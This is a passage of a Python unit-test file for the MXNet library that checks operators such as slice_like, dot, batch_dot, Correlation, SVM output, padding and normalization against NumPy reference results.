axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]: # for test convenience, the third and fourth input dims should be of the form 4*x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
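                    # With all loc-net weights zero, the predicted affine is just
                    # the fc bias: theta = [[0.5, 0, 0], [0, 0.5, 0]], a 0.5x zoom
                    # into the centre, so the STN output should equal the
                    # central crop checked below.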
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
for m in range(1, 5):
for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        continue  # 1-D dot only makes sense for k == 1
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-3)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
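# Numpy-only sketch (the helper name `_np_dot_grads` is ad hoc, illustration
# only) of the matrix-product gradient identities that the expected values in
# test_dot rely on: for C = A @ B with upstream gradient dC,
#     dA = dC @ B.T    and    dB = A.T @ dC,
# which follow from dC[i, j] / dA[i, k] = B[k, j].
def _np_dot_grads(a, b, dc):
    return np.dot(dc, b.T), np.dot(a.T, dc)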
@with_seed()
def test_batch_dot():
dtypes = ['float32', 'float64']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
                        a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
                        b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=default_context(),
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0].asnumpy(), c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
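# Note (illustrative): the transposes applied inside test_batch_dot follow
# from d/d(A^T) = (d/dA)^T; when an input is stored transposed, the expected
# gradient with respect to the stored array is the transpose of the gradient
# with respect to the untransposed one, so agrad_npy/bgrad_npy are transposed
# alongside a_npy/b_npy.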
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
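# Worked shape example (illustration only) for the first unittest_correlation
# call below: data 1x3x10x10 with pad_size=4, kernel_size=1, max_displacement=4,
# stride1=1 and stride2=1 gives paddedbottomwidth = 10 + 2*4 = 18,
# kernel_radius = 0, border_size = 4, top_width = top_height = (18 - 8) // 1 = 10,
# neighborhood_grid_width = 2*4 + 1 = 9, and top_channels = 9*9 = 81.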
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
    net1 = get_correlation(img1, img2, kernel_size, max_displacement, stride1, stride2, pad_size, is_multiply)
    exe1 = net1.simple_bind(default_context(), img1=img1.shape, img2=img2.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0].asnumpy(), forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
        if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
        if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected: %s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
            raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad.asnumpy())
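# Derivation note (explanatory only): with the label encoded as l_mask in
# {-1, +1} per class, the L1-SVM hinge loss is L = max(0, 1 - y * x); its
# gradient w.r.t. x is -y where 1 - y * x > 0 and 0 elsewhere, which is
# exactly the grad_np expression checked above.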
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
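# Note (illustrative): np_instance_norm normalizes each (batch, channel) slice
# over its spatial dimensions only and then applies the per-channel affine
# (weight, bias) broadcast across the batch; unlike batch norm, no statistics
# are shared across the batch dimension.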
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0].asnumpy()
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
